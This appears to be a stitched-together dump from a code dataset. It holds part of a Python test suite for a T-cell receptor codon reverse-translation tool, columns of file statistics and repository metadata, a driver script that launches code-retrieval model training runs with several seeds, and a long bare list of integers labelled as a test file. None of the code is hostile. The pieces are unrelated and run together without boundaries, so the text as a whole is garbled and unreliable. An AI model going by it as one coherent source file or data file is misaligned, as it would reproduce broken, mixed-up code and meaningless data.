    sequence shown below, as insertion codons are unknown and degenerate.
    """
    tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
    r = tc.guess_reverse_translation(v_gene_name= 'TRBV29*01' ,
                                     j_gene_name= 'TRBJ2-2*01' ,
                                     cdr3_aa = 'CASSPTGQLYF')
    real = 'tgtgctagcagccccaccgggcagctctacttt'.upper()
    # BUGFIX: the original 3' check sliced [-10:-1], which drops the final
    # base and so only compared 9 nt (never the last nucleotide).
    # [-10:] compares the full 10-base 3' edge.
    assert r[0:10] == real[0:10]
    assert r[-10:] == real[-10:]
    assert r == 'TGTGCTAGCAGTCCTACCGGGCAGCTCTACTTT'
def test_TCRcodon_small_dataframe_beta():
    """Synthetic beta-chain reverse translations match the real nucseq lengths."""
    codon_tool = TCRcodon(organism="mouse", db_file="alphabeta_db.tsv")
    beta = clone_df_subset[['v_b_gene', 'j_b_gene', 'cdr3_b_aa', 'cdr3_b_nucseq']]
    synthetic = beta.apply(
        lambda row: codon_tool.guess_reverse_translation(
            row['v_b_gene'], row['j_b_gene'], row['cdr3_b_aa'], verbose=False),
        axis=1)
    syn_lengths = [len(seq) for seq in synthetic]
    real_lengths = [len(seq) for seq in beta['cdr3_b_nucseq']]
    assert np.all(syn_lengths == real_lengths)
def test_TCRcodon_small_dataframe_alpha():
    """Synthetic alpha-chain reverse translations match the real nucseq lengths."""
    codon_tool = TCRcodon(organism="mouse", db_file="alphabeta_db.tsv")
    alpha = clone_df_subset[['v_a_gene', 'j_a_gene', 'cdr3_a_aa', 'cdr3_a_nucseq']]
    synthetic = alpha.apply(
        lambda row: codon_tool.guess_reverse_translation(
            row['v_a_gene'], row['j_a_gene'], row['cdr3_a_aa'], verbose=False),
        axis=1)
    # Check that synthetic and real seqs are the same length.
    syn_lengths = [len(seq) for seq in synthetic]
    real_lengths = [len(seq) for seq in alpha['cdr3_a_nucseq']]
    assert np.all(syn_lengths == real_lengths)
def test_TCRcodon_smal_dataframe_alpha_beta_lots():
    """Bigger example: reverse translate both beta and alpha chains of dash.csv."""
    codon_tool = TCRcodon(organism="mouse", db_file="alphabeta_db.tsv")
    df = pd.read_csv("tcrdist/test_files_compact/dash.csv")
    # Beta first, then alpha — same column layout for each chain.
    for chain in ('b', 'a'):
        v_col, j_col = 'v_%s_gene' % chain, 'j_%s_gene' % chain
        aa_col, nuc_col = 'cdr3_%s_aa' % chain, 'cdr3_%s_nucseq' % chain
        synthetic = df.apply(
            lambda row: codon_tool.guess_reverse_translation(
                row[v_col], row[j_col], row[aa_col], verbose=False),
            axis=1)
        # Check that synthetic and real seqs are the same length.
        syn_lengths = [len(seq) for seq in synthetic]
        real_lengths = [len(seq) for seq in df[nuc_col]]
        assert np.all(syn_lengths == real_lengths)
def test_TCRcodon_smal_dataframe_delta_lots():
    """Reverse translate sant.csv CDR3s and check synthetic lengths are 3x the aa lengths.

    NOTE(review): despite "delta" in the name, this test reads the gamma (g)
    chain columns; the sibling "gama" test reads the delta columns — confirm
    whether the names were swapped intentionally.
    """
    codon_tool = TCRcodon(organism="human", db_file="gammadelta_db.tsv")
    df = pd.read_csv("tcrdist/test_files_compact/sant.csv")
    # Sant data doesn't provide a J gene, so we are handicapped in that
    # regard; for testing we just fix a single guess.
    df['j_g_gene'] = 'TRGJ1*01'
    synthetic = df.apply(
        lambda row: codon_tool.guess_reverse_translation(
            row['v_g_gene'], row['j_g_gene'], row['cdr3_g_aa'], verbose=False),
        axis=1)
    # Each amino acid should contribute exactly one codon (3 nt).
    syn_lengths = [len(seq) for seq in synthetic]
    expected_lengths = [3 * len(aa) for aa in df['cdr3_g_aa']]
    assert np.all(syn_lengths == expected_lengths)
def test_TCRcodon_smal_dataframe_gama_lots():
    """Guess J genes for sant.csv delta chains, then reverse translate and check lengths.

    NOTE(review): despite "gama" in the name, this test reads the delta (d)
    chain columns; the sibling "delta" test reads the gamma columns — confirm
    whether the names were swapped intentionally.
    """
    tc = TCRcodon(organism="human", db_file="gammadelta_db.tsv")
    df = pd.read_csv("tcrdist/test_files_compact/sant.csv")
    # No J gene is provided, so infer one per CDR3 from the amino-acid sequence.
    df['j_d_gene'] = [tc.get_best_j_gene(aa_seq=x, verbose=False) for x in df['cdr3_d_aa']]
    df = df[df['v_d_gene'].notna()].copy()
    syn_nucs = df.apply(
        lambda r: tc.guess_reverse_translation(
            r['v_d_gene'], r['j_d_gene'], r['cdr3_d_aa'], verbose=False),
        axis=1)
    # Check that synthetic seq lengths equal 3 nt per amino acid.
    len_syn = [len(x) for x in syn_nucs]
    len_real = [3 * len(x) for x in df['cdr3_d_aa']]
    # (A verbatim duplicate of this assert was removed.)
    assert np.all(len_syn == len_real)
def test_get_bets_j_gene():
    """get_best_j_gene recovers TRDJ1*01 for a known sequence and a fixed distribution overall."""
    # Removed unused import: `from tcrdist.pairwise import hm_metric` was never referenced.
    tc = TCRcodon(organism="human", db_file="gammadelta_db.tsv")
    df = pd.read_csv("tcrdist/test_files_compact/sant.csv")
    someseq = df['cdr3_d_aa'][1]
    x = tc.get_best_j_gene(aa_seq=someseq, verbose=True)
    assert x == 'TRDJ1*01'
    # Test for all sequences: the guessed-gene distribution must match exactly.
    xx = [tc.get_best_j_gene(aa_seq=x, verbose=False) for x in df['cdr3_d_aa']]
    vc = pd.Series(xx).value_counts().to_dict()
    assert vc == {'TRDJ1*01': 271, 'TRDJ3*01': 66, 'TRDJ2*01': 20, 'TRDJ4*01': 9}
def test_get_bets_j_gene_room_for_improvement():
    """get_best_j_gene agrees with the recorded beta J genes at least sometimes.

    THIS CAN'T RESOLVE TIES, OR WHO KNOWS WHAT ELSE — hence the loose bound.
    """
    tc = TCRcodon(organism="mouse", db_file="alphabeta_db.tsv")
    beta = clone_df_subset[['v_b_gene', 'j_b_gene', 'cdr3_b_aa', 'cdr3_b_nucseq']]
    guesses = [tc.get_best_j_gene(aa_seq=seq, verbose=False) for seq in beta['cdr3_b_aa']]
    assert np.all(beta['j_b_gene'][0:2] == guesses[0:2])
    assert np.sum(beta['j_b_gene'] == guesses) > 20
| 179.538462
| 5,837
| 0.603599
| 4,147
| 23,340
| 3.328912
| 0.089462
| 0.018472
| 0.012749
| 0.0113
| 0.740311
| 0.734806
| 0.725534
| 0.70996
| 0.698805
| 0.688446
| 0
| 0.247139
| 0.123822
| 23,340
| 130
| 5,838
| 179.538462
| 0.427922
| 0.021165
| 0
| 0.465347
| 0
| 0
| 0.580738
| 0.011913
| 0
| 0
| 0
| 0
| 0.188119
| 1
| 0.128713
| false
| 0
| 0.059406
| 0
| 0.188119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
66c588cb21d38fc905a076a58aa4f5d7d12b897c
| 2,280
|
py
|
Python
|
data/run.py
|
bentrevett/pytorch-for-code
|
1dd35e4b80eba8b1eae687d4f9c4a1c4d8122d0a
|
[
"MIT"
] | 9
|
2020-01-20T12:59:45.000Z
|
2021-03-05T02:46:44.000Z
|
data/run.py
|
bentrevett/pytorch-for-code
|
1dd35e4b80eba8b1eae687d4f9c4a1c4d8122d0a
|
[
"MIT"
] | null | null | null |
data/run.py
|
bentrevett/pytorch-for-code
|
1dd35e4b80eba8b1eae687d4f9c4a1c4d8122d0a
|
[
"MIT"
] | null | null | null |
"""Driver: run the four code-retrieval models over java and 6L data for five seeds."""
import subprocess


def _run(command):
    """Run *command* through the shell and block until it finishes."""
    process = subprocess.Popen(command, shell=True)
    process.wait()


# One-time data-preparation steps, kept for reference (previously disabled
# via no-op string statements; already executed):
#   python get_codesearchnet.py
#   python process_codesearchnet.py
#   python get_vocab.py --data codesearchnet/{lang}_train.jsonl
#       for lang in go, java, javascript, php, python, ruby, 6L
#   python bpe.py --data codesearchnet/java --vocab_max_size 10000 --bpe_pct 0.5 --language java
#   python bpe.py --data codesearchnet/6L --vocab_max_size 10000 --bpe_pct 0.5 --language 6L

for seed in [1, 2, 3, 4, 5]:
    # Same experiment for each language; only the file prefix differs.
    # Order preserved from the original script: java first, then 6L, per seed.
    for language in ['java', '6L']:
        train_data = f'data/codesearchnet/{language}_train_bpe_10000_0.5.jsonl'
        valid_data = f'data/codesearchnet/{language}_valid_bpe_10000_0.5.jsonl'
        test_data = f'data/codesearchnet/{language}_test_bpe_10000_0.5.jsonl'
        code_vocab = f'data/codesearchnet/{language}-bpe-10000-0.5_code_vocab.jsonl'
        desc_vocab = f'data/codesearchnet/{language}-bpe-10000-0.5_desc_vocab.jsonl'
        for model in ['nbow', 'rnn', 'cnn', 'transformer']:
            command = f'python code_retrieval_{model}.py --train_data {train_data} --valid_data {valid_data} --test_data {test_data} --code_vocab {code_vocab} --desc_vocab {desc_vocab} --seed {seed}'
            _run(command)
| 42.222222
| 195
| 0.721053
| 325
| 2,280
| 4.824615
| 0.163077
| 0.140944
| 0.057398
| 0.063776
| 0.811862
| 0.811862
| 0.811862
| 0.811862
| 0.772959
| 0.730867
| 0
| 0.048842
| 0.128947
| 2,280
| 54
| 196
| 42.222222
| 0.740685
| 0
| 0
| 0.4
| 0
| 0.1
| 0.628006
| 0.387553
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
66e2ddc96706895503d4aef34a89030b2db9ddfc
| 29,210
|
py
|
Python
|
assignments/task_02/test_cases/test_03.py
|
Rlperez1207/stem
|
1bdfb63bc7b9b28ca505cc4b71c3a70937613658
|
[
"MIT"
] | null | null | null |
assignments/task_02/test_cases/test_03.py
|
Rlperez1207/stem
|
1bdfb63bc7b9b28ca505cc4b71c3a70937613658
|
[
"MIT"
] | null | null | null |
assignments/task_02/test_cases/test_03.py
|
Rlperez1207/stem
|
1bdfb63bc7b9b28ca505cc4b71c3a70937613658
|
[
"MIT"
] | null | null | null |
99
52
88
70
6
92
10
17
68
26
8
76
89
7
66
2
36
77
99
94
64
93
97
47
88
4
93
67
82
15
29
28
89
11
93
81
30
8
34
14
54
22
42
26
13
59
4
39
82
71
40
96
92
72
19
2
28
75
27
42
61
43
28
20
80
62
35
78
71
7
25
52
94
96
23
16
56
73
99
18
87
43
79
20
11
96
85
77
53
73
13
13
35
16
43
1
36
81
17
100
7
92
10
68
61
2
54
1
71
43
98
12
4
72
35
64
88
46
28
70
70
16
8
35
10
96
88
37
17
4
66
34
25
15
24
16
88
63
75
49
51
51
48
71
36
58
1
16
31
27
16
53
78
68
11
41
38
65
79
18
87
97
28
14
46
19
46
24
99
94
43
9
70
89
59
10
81
50
48
61
35
9
31
35
78
3
57
10
92
77
51
8
35
88
31
3
22
34
7
97
14
93
1
92
21
9
36
20
51
68
70
72
49
49
7
95
14
38
11
24
55
95
53
40
36
15
13
40
99
98
81
9
27
58
5
74
84
80
85
44
100
22
6
53
79
36
99
61
67
46
16
26
78
65
22
89
49
15
94
25
26
3
86
82
8
70
60
6
56
47
79
96
75
54
12
89
74
28
53
38
77
31
47
21
62
57
47
63
71
78
53
73
40
77
25
22
14
100
10
95
40
30
22
88
34
5
68
82
81
71
64
43
56
15
24
65
94
92
59
7
59
39
29
95
98
96
20
52
47
23
13
57
20
77
71
66
45
79
50
91
81
87
26
11
54
76
36
42
18
73
2
44
69
54
16
5
97
82
17
5
40
74
63
13
37
48
44
31
34
44
38
36
84
36
51
57
65
36
7
7
46
81
46
39
49
78
36
89
95
11
29
32
37
20
88
62
93
63
79
88
97
78
60
29
30
4
49
98
86
9
67
16
81
96
86
10
76
34
24
67
88
24
17
72
16
41
28
79
98
67
78
87
15
13
84
8
38
89
67
25
80
47
66
54
87
47
26
55
96
57
30
23
56
58
25
85
16
98
69
27
30
92
6
2
56
2
12
84
2
62
7
65
71
49
68
25
96
70
44
43
60
63
20
40
87
11
32
20
5
6
15
27
9
75
44
27
92
38
41
10
4
8
61
86
33
59
26
58
6
71
54
89
47
43
60
26
88
69
73
73
82
14
13
87
84
29
37
48
46
62
52
46
29
59
44
54
94
40
74
94
15
82
44
38
2
78
63
65
86
69
51
39
28
78
76
17
26
10
14
48
77
36
66
65
18
45
42
7
87
76
39
94
76
44
72
77
94
87
38
54
64
82
53
94
53
96
77
90
88
43
36
67
56
34
3
89
99
61
74
98
15
47
79
35
81
53
44
4
1
26
54
25
64
62
53
25
68
99
70
69
39
63
81
42
26
100
75
92
24
18
48
7
37
41
98
35
30
77
82
22
94
40
86
73
11
91
48
95
38
52
48
51
73
11
48
76
21
48
15
30
35
28
11
21
94
21
72
91
32
86
62
9
40
79
44
78
76
35
52
96
84
69
38
13
85
77
11
88
34
93
84
47
86
16
93
67
22
37
27
97
97
64
93
52
74
1
41
45
43
34
93
13
57
88
35
35
35
16
8
90
74
8
66
96
43
36
47
84
3
11
59
90
40
84
96
54
95
67
86
10
97
25
63
68
92
72
71
6
57
88
94
90
52
29
54
10
76
34
19
59
5
23
49
33
83
64
72
33
87
37
75
43
71
64
94
94
74
90
13
95
60
43
100
59
100
9
57
63
61
48
65
21
13
63
38
79
54
95
32
39
70
96
64
88
97
17
71
29
6
74
9
65
35
39
42
34
84
59
35
86
52
83
76
43
17
84
50
3
29
86
5
75
55
39
92
33
58
52
35
56
90
69
52
99
7
61
18
19
92
85
72
39
10
75
31
51
45
21
29
53
65
9
47
25
70
81
48
43
43
21
24
56
24
25
18
15
53
86
4
7
66
46
30
91
72
88
11
36
39
62
92
62
18
89
98
56
76
82
60
18
47
59
85
32
68
65
68
61
19
36
96
92
57
7
44
99
91
72
76
47
95
37
90
89
88
29
45
71
80
67
96
24
98
69
3
60
10
67
62
77
96
82
10
46
97
89
8
95
75
54
97
74
49
76
59
6
79
81
57
27
64
79
66
33
3
56
92
89
56
27
35
44
92
49
92
23
29
96
18
38
39
35
93
42
69
74
57
59
74
36
62
79
21
99
93
7
92
6
59
15
87
27
62
64
72
95
41
35
29
55
1
45
39
88
85
87
33
42
49
17
85
92
30
59
44
86
45
30
98
4
48
57
37
82
6
77
64
52
84
73
37
93
48
35
12
25
1
76
49
86
4
52
9
29
14
28
65
75
37
51
48
10
100
96
12
24
26
43
8
75
26
70
32
79
16
25
81
18
79
89
39
44
70
94
5
97
53
51
84
18
58
48
11
63
75
48
29
36
97
11
38
33
3
74
61
3
36
48
13
36
26
80
46
65
16
69
96
33
93
15
82
46
73
64
18
69
69
71
2
57
60
15
40
71
56
34
86
85
52
29
75
49
28
60
9
87
42
62
67
9
1
96
48
99
63
33
24
34
3
40
84
91
66
36
63
20
91
17
71
83
85
97
85
18
84
46
63
40
51
45
46
59
48
35
75
75
100
24
67
67
43
94
53
35
93
78
58
23
74
52
53
57
86
26
74
89
19
92
82
46
93
98
34
6
57
81
93
26
50
19
36
28
5
40
26
10
15
30
68
9
15
4
30
97
81
70
37
5
73
29
72
19
23
91
1
22
71
16
8
41
56
46
9
87
14
12
44
100
54
99
96
61
98
87
94
63
64
16
52
87
52
9
45
28
47
56
83
63
35
80
19
15
1
88
16
38
6
89
86
88
13
25
90
68
56
16
6
2
9
95
22
31
68
62
35
61
93
58
64
5
34
16
20
52
24
3
97
5
52
42
11
82
32
34
68
35
16
52
54
95
1
15
81
30
49
72
48
50
28
17
31
27
33
87
40
11
58
14
69
29
73
74
84
74
63
70
53
48
75
70
19
82
3
87
5
41
61
53
68
42
93
3
88
3
49
52
66
34
8
91
81
24
45
91
61
81
12
68
12
49
62
57
83
99
62
49
60
74
2
1
90
87
77
32
46
5
29
20
6
71
43
62
78
22
91
34
77
86
15
66
74
40
80
29
7
54
32
54
85
91
48
53
4
20
22
63
15
64
35
78
86
88
45
46
55
41
24
14
54
59
2
47
86
17
35
86
54
35
25
85
24
2
34
90
98
32
75
3
68
42
34
20
49
9
49
67
78
1
73
26
25
60
18
13
26
72
68
18
23
42
35
85
83
9
15
54
49
99
93
51
23
16
94
17
20
80
37
11
42
22
37
35
22
18
26
28
9
52
71
48
45
21
67
37
96
14
75
7
16
40
37
26
92
66
60
64
10
90
84
54
86
80
82
92
57
82
78
17
52
2
42
32
5
44
50
39
57
91
49
70
52
13
88
68
29
42
29
1
43
88
63
84
55
10
32
87
85
89
13
55
22
97
41
76
90
41
61
23
4
85
36
56
67
90
33
19
19
24
56
83
97
13
54
84
97
33
20
27
2
48
53
5
93
82
63
76
13
21
25
8
65
46
83
41
11
96
91
76
11
30
2
75
36
3
27
16
78
52
68
58
42
38
50
9
79
24
10
96
45
63
84
56
64
15
27
75
20
6
7
38
50
32
31
39
8
33
94
77
97
97
77
37
6
3
11
64
16
57
63
74
69
78
4
6
33
47
1
56
87
12
45
34
33
97
28
9
11
95
53
43
45
23
53
70
69
29
36
10
65
31
81
5
81
70
55
23
77
15
64
59
92
54
23
1
38
19
90
47
61
98
46
28
81
54
43
53
38
77
11
67
9
58
92
77
14
54
58
66
39
42
50
60
58
99
87
39
32
63
41
20
94
40
34
94
8
47
1
34
76
43
12
99
98
81
90
91
50
21
7
65
24
80
14
20
28
50
44
32
8
93
99
31
10
17
25
5
30
73
95
87
79
38
34
1
57
7
19
28
79
23
4
48
47
99
66
41
90
80
72
53
58
57
82
68
58
1
28
68
56
56
76
27
88
18
94
24
38
84
36
76
29
54
67
46
40
91
78
59
58
34
28
69
4
63
15
79
100
88
32
75
93
16
14
74
2
98
99
36
19
21
52
11
8
60
83
58
41
68
59
69
28
44
68
84
1
26
34
26
80
59
37
6
34
65
96
17
32
7
79
56
18
31
10
11
71
56
15
76
49
96
16
95
67
15
37
35
3
78
33
3
71
3
23
53
4
42
73
11
46
24
35
88
7
29
70
82
16
15
26
74
8
55
93
59
70
62
14
17
10
99
77
86
68
29
15
99
53
43
53
78
42
31
78
64
89
52
70
2
67
8
74
57
2
70
3
9
65
78
51
2
90
75
28
50
74
71
63
30
72
18
96
88
75
88
21
94
87
34
65
8
41
2
6
32
3
66
93
92
43
63
40
80
31
82
17
81
27
15
28
68
40
12
8
65
65
89
59
72
30
39
84
5
29
47
60
21
49
95
41
65
20
71
36
38
27
66
50
1
47
82
20
14
97
67
90
55
27
17
70
29
19
60
75
83
21
53
61
16
54
15
7
13
6
75
24
80
84
67
90
14
72
77
4
80
78
76
66
60
54
35
19
100
50
21
48
85
98
17
53
98
68
89
60
69
18
66
69
11
74
27
77
40
89
42
57
75
38
57
80
73
11
77
94
85
15
8
53
88
71
32
23
5
22
94
89
26
77
19
98
3
83
23
3
4
81
91
3
31
85
31
31
7
81
9
15
94
66
46
86
96
60
31
51
29
91
65
20
29
2
51
68
83
79
10
10
23
70
52
69
79
79
79
59
5
28
82
40
82
66
73
32
30
85
89
19
54
56
98
23
43
52
100
57
77
80
23
1
21
72
89
58
94
66
83
13
89
59
25
77
24
36
41
43
90
53
39
39
8
59
77
69
55
23
71
36
73
64
28
44
32
53
59
68
84
58
74
50
85
94
79
40
71
58
8
74
26
62
64
45
48
2
75
97
53
88
40
3
92
19
70
19
16
40
46
82
6
4
68
77
33
79
85
57
8
1
44
2
63
28
76
60
96
71
95
47
6
35
1
84
45
37
68
35
92
51
7
6
59
50
9
64
41
98
58
65
64
71
91
42
97
67
13
57
53
44
14
13
74
62
9
68
59
15
43
71
85
95
78
68
71
53
28
66
22
14
77
20
80
1
54
30
57
47
69
41
6
34
88
47
100
98
90
70
94
77
19
42
8
69
73
27
24
9
42
75
79
89
56
51
90
23
84
100
6
17
85
89
56
18
12
82
79
17
18
33
87
6
8
14
72
85
91
31
98
39
20
61
74
91
28
78
68
76
84
68
50
44
13
51
92
44
96
34
53
45
22
91
46
73
3
100
53
1
58
97
58
15
38
15
23
57
37
42
65
59
35
70
80
21
73
1
98
77
62
5
35
96
23
88
62
85
61
19
86
73
84
16
72
48
37
73
41
25
57
89
17
32
76
76
4
78
36
16
80
51
88
79
55
8
13
72
57
67
98
6
24
7
78
33
32
79
48
47
49
50
22
90
63
18
2
33
24
85
100
100
21
57
65
20
15
75
32
77
75
67
86
64
25
68
83
60
23
9
79
66
65
72
43
84
100
3
73
55
34
5
29
13
37
15
40
67
30
4
75
66
10
81
75
72
84
90
20
15
56
8
74
77
21
44
48
25
24
18
4
60
14
39
36
82
64
45
86
65
46
64
74
87
36
92
68
98
62
48
98
6
31
22
72
18
36
33
37
82
65
91
91
54
44
38
87
81
61
90
8
11
14
77
83
68
43
9
80
23
11
77
77
35
58
81
14
65
75
2
30
82
85
80
66
50
97
90
34
80
85
63
22
12
29
11
68
88
28
53
100
88
47
47
41
1
80
58
22
58
74
6
77
52
44
23
100
86
84
81
85
48
77
94
69
27
30
68
80
93
92
88
24
8
78
16
98
41
39
42
36
71
77
35
89
95
56
8
37
51
65
55
20
19
13
1
14
74
94
8
17
21
82
62
39
48
41
60
77
75
38
15
79
84
13
8
76
12
1
33
46
96
68
27
29
29
44
33
54
18
62
72
27
54
68
68
7
6
38
1
100
95
37
23
42
12
41
49
1
94
98
67
26
36
75
3
61
25
64
63
43
12
91
86
89
27
94
2
29
43
80
67
75
35
47
53
26
5
66
15
14
77
29
99
18
15
91
83
89
26
74
84
61
34
40
74
94
25
49
58
95
34
97
25
33
74
12
50
64
35
57
43
53
46
26
22
22
81
85
51
38
68
6
28
58
16
92
90
48
20
8
57
64
64
54
56
16
34
87
55
96
67
21
79
22
24
33
44
96
1
48
42
30
62
69
59
96
8
90
36
90
99
30
68
46
48
49
68
98
44
28
96
6
98
100
31
52
12
58
92
40
61
90
12
46
22
62
10
68
59
87
6
58
48
61
25
100
36
79
21
14
39
46
40
67
89
57
25
59
87
1
66
18
96
36
33
84
92
83
23
78
11
16
32
47
81
24
66
16
70
61
65
26
60
76
71
1
4
90
40
81
16
91
17
92
59
30
39
83
54
29
5
56
58
56
95
87
78
27
54
89
56
50
9
72
27
49
10
63
37
12
71
92
39
6
19
16
79
66
33
35
35
97
94
80
27
88
77
49
63
58
55
6
64
75
12
77
39
86
62
57
92
45
72
60
95
69
74
10
20
77
28
61
71
40
72
69
11
18
98
35
43
52
2
11
24
83
48
100
66
46
23
84
96
90
43
100
91
2
6
18
25
94
62
19
31
55
10
50
93
31
35
9
2
17
34
80
48
30
24
56
94
85
32
96
21
50
93
24
44
15
82
52
88
88
23
24
92
7
98
7
67
8
47
82
38
70
99
74
4
60
92
37
91
8
17
56
44
54
29
12
59
64
3
70
12
34
97
53
15
74
73
46
3
42
54
12
60
47
64
14
53
22
19
91
92
55
52
72
42
43
49
71
26
99
70
66
50
41
26
75
24
73
91
21
84
22
97
61
32
59
6
45
56
89
55
91
51
3
59
83
97
95
10
23
68
93
17
63
32
23
97
5
94
94
63
88
57
100
61
22
51
97
50
40
94
24
52
35
81
85
59
78
78
63
59
26
53
14
67
62
22
94
19
33
36
51
87
100
83
11
16
79
54
67
37
9
56
82
68
94
82
32
14
100
57
65
81
22
41
5
75
3
57
80
18
61
61
6
54
27
58
96
62
62
1
21
56
57
44
29
84
37
23
64
1
1
10
23
48
30
46
89
74
90
32
52
1
52
82
30
54
49
28
52
97
35
66
92
44
38
58
24
56
3
5
40
76
53
66
11
29
44
12
35
73
32
95
86
100
46
1
98
76
81
63
40
39
29
53
85
52
71
68
100
16
91
31
57
29
43
5
89
91
87
42
37
30
13
85
84
93
90
35
68
76
28
78
97
1
33
91
49
68
97
61
65
95
80
27
89
66
75
24
35
66
47
97
32
79
79
14
16
94
94
86
65
13
59
16
12
69
81
25
71
65
16
49
93
71
95
62
10
58
71
58
31
82
48
29
76
37
40
81
66
97
96
49
17
30
98
80
72
38
83
80
33
19
87
50
87
99
18
25
26
49
50
37
39
70
62
34
18
33
20
76
56
37
43
88
45
2
62
79
95
23
64
46
73
56
14
79
1
10
69
85
80
62
96
38
34
83
43
15
98
33
48
75
1
20
92
88
18
83
43
38
55
88
87
55
40
67
100
2
21
84
28
26
52
27
75
19
41
2
30
63
8
92
92
17
18
95
26
77
78
22
93
91
95
89
71
11
88
4
98
93
78
41
15
92
99
95
23
1
58
19
40
56
66
14
29
28
98
11
86
67
64
17
36
88
34
73
40
78
28
6
1
97
10
96
64
73
67
12
40
75
50
37
64
39
50
84
30
39
27
50
30
19
6
86
9
94
80
59
27
25
28
82
49
9
93
87
60
51
72
4
91
14
7
92
73
30
13
69
4
20
83
71
73
33
73
10
22
35
55
75
72
82
67
92
82
65
97
52
30
9
37
15
53
20
10
78
91
37
68
30
67
76
99
19
100
90
86
48
10
34
66
96
74
21
10
39
26
14
14
23
90
32
69
78
19
57
89
23
53
26
49
31
56
66
19
45
9
74
58
56
5
8
98
13
27
42
57
39
29
56
14
99
94
82
76
80
58
56
94
97
51
52
28
61
6
73
98
38
63
51
60
25
84
45
26
16
57
83
35
98
86
17
53
64
23
7
23
84
64
65
52
13
64
48
37
22
42
60
71
95
59
77
64
32
55
33
33
22
90
63
63
63
94
12
86
53
91
45
64
89
52
99
8
76
19
87
50
95
27
11
51
17
98
24
65
94
14
21
99
70
67
45
50
96
61
38
36
3
19
6
11
82
3
34
17
94
28
61
86
74
39
9
99
57
46
64
68
98
59
27
69
16
8
64
99
20
72
35
17
50
11
100
51
17
77
9
81
68
16
83
14
61
77
11
91
42
81
81
38
68
90
34
59
98
86
78
46
93
93
51
34
70
26
73
2
21
18
41
98
5
57
63
86
48
61
61
70
45
92
66
23
11
36
39
89
32
10
74
12
27
54
25
9
61
55
67
6
44
20
49
52
98
8
61
69
68
35
22
1
40
46
48
4
30
66
41
4
64
14
16
72
49
9
3
99
44
86
48
53
10
23
34
54
55
84
49
6
99
54
48
42
45
38
64
43
51
21
3
54
97
53
98
92
28
16
52
97
83
64
52
80
14
94
97
11
48
86
43
22
38
10
68
15
78
68
81
69
13
38
53
73
38
75
41
96
74
50
55
72
76
9
45
42
13
62
81
93
68
87
12
73
100
46
15
87
93
32
31
24
42
43
7
49
93
81
85
38
60
67
36
3
74
43
7
88
2
5
94
21
38
36
76
4
97
89
91
73
25
62
79
75
61
12
85
71
34
48
54
84
62
33
3
29
18
18
57
40
57
75
21
63
91
84
77
46
67
13
71
37
96
14
31
82
97
41
41
29
89
60
50
44
66
72
28
20
37
90
88
29
7
73
81
41
52
90
27
90
19
36
17
48
15
73
79
71
26
44
72
45
69
69
39
7
54
8
8
38
79
19
95
37
5
66
9
41
53
95
68
62
31
36
93
36
20
51
9
18
19
14
21
72
56
51
31
92
92
19
67
82
62
86
15
96
76
68
68
33
12
82
76
44
97
63
4
60
80
89
20
12
51
53
49
13
5
61
77
15
9
48
25
66
27
75
47
74
39
2
33
5
47
40
6
48
9
19
28
18
13
89
29
32
83
84
52
92
85
58
14
55
81
61
19
22
72
100
45
95
77
35
16
60
61
70
11
55
55
9
25
46
9
81
78
20
68
44
38
84
59
47
36
55
89
39
45
89
63
77
53
76
74
49
57
82
65
75
56
38
8
5
41
13
94
64
40
22
49
43
34
26
70
96
56
21
41
48
95
94
57
20
1
48
2
5
62
18
76
98
45
65
47
54
19
26
10
58
28
12
47
88
13
32
4
13
42
11
39
10
18
79
5
87
79
90
27
74
86
17
70
83
55
34
88
23
49
7
64
68
90
54
43
97
9
72
2
34
49
39
7
49
81
99
80
88
22
58
57
33
30
36
48
39
66
46
60
81
86
77
42
25
14
2
36
18
74
77
49
30
45
50
78
9
7
16
96
45
49
37
29
12
44
81
21
93
32
50
32
54
53
22
16
52
55
24
22
66
32
54
6
14
62
96
79
73
42
60
31
25
71
43
79
91
33
20
55
19
87
16
3
58
9
42
60
44
81
24
20
73
81
48
11
1
94
84
22
11
60
98
49
67
59
76
44
73
53
64
95
48
10
10
3
81
22
7
73
92
86
90
53
57
69
81
24
42
8
12
78
44
84
84
2
19
34
50
69
34
14
21
23
48
80
97
94
47
28
23
69
29
34
17
57
76
56
96
82
68
58
60
77
77
91
40
19
10
62
25
6
87
52
88
38
11
97
84
57
59
20
98
61
82
47
84
42
76
89
84
75
66
25
63
97
36
19
85
40
86
89
77
68
12
28
56
28
23
99
33
27
39
93
92
80
10
34
36
79
84
58
63
27
10
82
92
23
42
98
97
44
15
16
58
92
39
81
83
46
86
99
65
68
12
39
43
39
14
16
8
91
67
43
46
60
32
79
89
95
36
89
8
52
39
20
79
72
9
81
35
50
51
33
62
6
53
51
65
21
76
94
54
52
55
68
34
66
92
58
20
49
11
53
85
60
97
8
81
31
94
48
8
27
29
32
21
80
90
38
74
92
4
50
41
4
23
82
81
34
62
42
99
73
82
86
91
47
65
36
42
54
44
22
83
34
79
35
35
61
80
65
29
18
88
82
51
25
81
95
73
11
99
29
77
54
54
90
26
62
23
38
89
77
21
60
57
80
67
39
21
65
61
56
49
75
29
18
47
24
46
79
85
29
25
9
100
77
33
51
20
26
4
90
50
45
42
28
9
78
79
83
25
33
12
40
43
82
10
55
68
7
38
46
29
79
61
72
7
28
73
34
25
80
79
39
32
20
66
35
60
69
33
82
8
62
84
56
42
42
93
51
35
50
31
71
74
50
21
15
83
64
35
87
50
91
29
37
86
60
93
57
82
21
60
40
25
93
64
51
50
3
26
83
4
76
63
49
22
72
89
48
9
70
77
53
36
52
65
80
70
49
56
93
40
12
19
16
29
98
79
1
70
18
90
58
2
58
17
44
16
52
58
29
26
31
76
99
11
12
1
5
60
66
24
11
59
83
20
22
21
28
21
80
13
83
29
34
64
49
74
58
2
43
78
98
63
21
10
36
56
66
94
65
37
71
85
3
29
26
4
34
24
5
52
68
68
66
70
4
78
17
95
96
84
